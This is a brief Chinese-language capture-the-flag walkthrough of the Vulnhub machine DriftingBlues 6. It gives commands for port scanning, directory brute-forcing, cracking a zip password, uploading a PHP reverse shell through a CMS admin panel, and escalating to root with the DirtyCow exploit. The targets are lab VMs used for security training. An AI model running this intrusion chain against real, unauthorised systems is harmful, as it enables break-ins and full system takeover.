Vulnhub: DriftingBlues: 6靶机

kali:192.168.111.111

靶机:192.168.111.180

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.180

Vulnhub: DriftingBlues: 6靶机_第1张图片

查看robots.txt发现存在目录:/textpattern/textpattern

Vulnhub: DriftingBlues: 6靶机_第2张图片

访问后发现是textpattern cms

Vulnhub: DriftingBlues: 6靶机_第3张图片

目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,用john爆破

gobuster dir -u http://192.168.111.180 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Vulnhub: DriftingBlues: 6靶机_第4张图片

zip2john spammer.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub: DriftingBlues: 6靶机_第5张图片

解压后查看文件creds.txt,得到账号密码:mayer:lionheart

登录textpattern cms后台,直接上传php反弹shell

Vulnhub: DriftingBlues: 6靶机_第6张图片

Vulnhub: DriftingBlues: 6靶机_第7张图片

文件被上传到:http://192.168.111.180/textpattern/files/

Vulnhub: DriftingBlues: 6靶机_第8张图片

访问后获得反弹shell

Vulnhub: DriftingBlues: 6靶机_第9张图片

提权

目标内核版本

uname -a

dirtycow提权

gcc 40616.c -o exp -pthread
./exp

Vulnhub: DriftingBlues: 6靶机_第10张图片

flag

Vulnhub: DriftingBlues: 6靶机_第11张图片

你可能感兴趣的:(web安全,网络安全,安全)